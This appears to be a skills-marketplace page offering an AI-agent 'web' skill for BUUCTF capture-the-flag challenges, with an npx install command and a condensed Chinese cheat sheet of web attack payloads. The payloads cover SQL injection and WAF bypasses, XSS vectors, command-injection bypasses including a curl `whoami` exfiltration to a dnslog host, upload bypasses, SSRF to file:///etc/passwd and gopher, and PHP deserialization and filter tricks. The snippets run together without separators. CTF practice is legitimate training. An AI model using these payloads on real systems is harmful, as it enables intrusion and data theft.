用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
直接命令不会经过审查 Prompt;运行前请先检查来源。
npx skills add https://github.com/MuWinds/BUUCTF_Agent --skill web命令会保持在同一行。复制前请横向滚动并检查完整内容。
想先保存到本地?可下载 SkillsMP 当前能够提供的文件。
正在显示 SKILL.md
基于 SOC 职业分类
| name | web |
| description | Web 安全攻防技术,包括 SQL 注入、XSS、文件上传、命令注入、SSRF、反序列化等常见漏洞的识别与利用。 |
| tags | ["sql-injection","xss","file-upload","command-injection","ssrf","deserialization","php"] |
ORDER BY 确定列数 -> UNION SELECT 提取数据AND 1=1/AND 1=2,时间盲注 SLEEP()/BENCHMARK()--batch --dbs --current-user/**/、双重编码、HPP 参数污染/*!50000select*/、%0a 换行、<> 替代空格<>\"'/ 过滤情况document.location、innerHTML 等 DOM 操作<img onerror=alert(1)>、<svg onload=alert(1)>、编码绕过;、&&、||、|、\n、`$IFS、{cmd,arg}、%09、< 重定向a=fl;b=ag;cat $a$b、通配符 cat /fl*、base64 编码curl \whoami`.xxx.dnslog.cn`、时间盲注Content-Type 为 image/png.php5、.phtml、.pht、.php.jpg(Apache 解析漏洞)GIF89a 或 PNG 文件头.htaccess 添加自定义解析规则file:///etc/passwd、dict://、gopher://http://127.0.0.1:端口、http://192.168.x.x@ 符号 http://attacker.com@127.0.0.1、进制转换 0x7f000001、IPv6 [::1]== 比较时 "0e123" == "0e456" 为 Truephp://filter/convert.base64-encode/resource=、php://input__construct、__destruct、__wakeup、__toString 魔术方法extract()、parse_str()、$$var../ 目录穿越、%00 截断(PHP < 5.3.4)